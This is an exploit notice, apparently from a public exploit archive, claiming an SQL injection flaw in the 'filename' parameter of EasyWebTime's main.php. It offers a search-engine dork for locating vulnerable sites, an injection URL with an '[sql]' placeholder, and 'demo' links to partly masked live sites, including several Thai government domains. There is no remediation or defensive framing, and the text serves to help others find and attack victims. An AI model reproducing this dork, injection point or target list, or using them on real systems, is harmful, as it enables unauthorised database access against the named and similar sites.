############################ # # Exploit Title : EasyWebTime - SQL Injection Vulnerability # # Author : IrIsT.Ir # # Discovered By : BestC0d3r # # Email : BestC0d3r[at]Yahoo[dot]com # # Home : http://IrIsT.Ir # # Software Link : http://www.easywebtime.com # # Security Risk : High # # Version : All Version # # Tested on : GNU/Linux Ubuntu - Windows Server - win7 # # Dork : inurl:"main.php?filename=" + inurl:/ewtadmin/ # ############################ # # Expl0iTs : # # http://target.com/main.php?filename=[sql] # # # D3mo : # # http://www.easXXXebtime.com/main.php?filename=[sql] # # http://www.cXX.go.th/main.php?filename=[sql] # # http://www.oXXe.go.th/main.php?filename=[sql] # # http://www.dXXr.go.th/main.php?filename=[sql] # ############################ # # Greats : Am!r - S!LeNCe - M3QD4D - M.e.H - s3ri0s bl@ck # ############################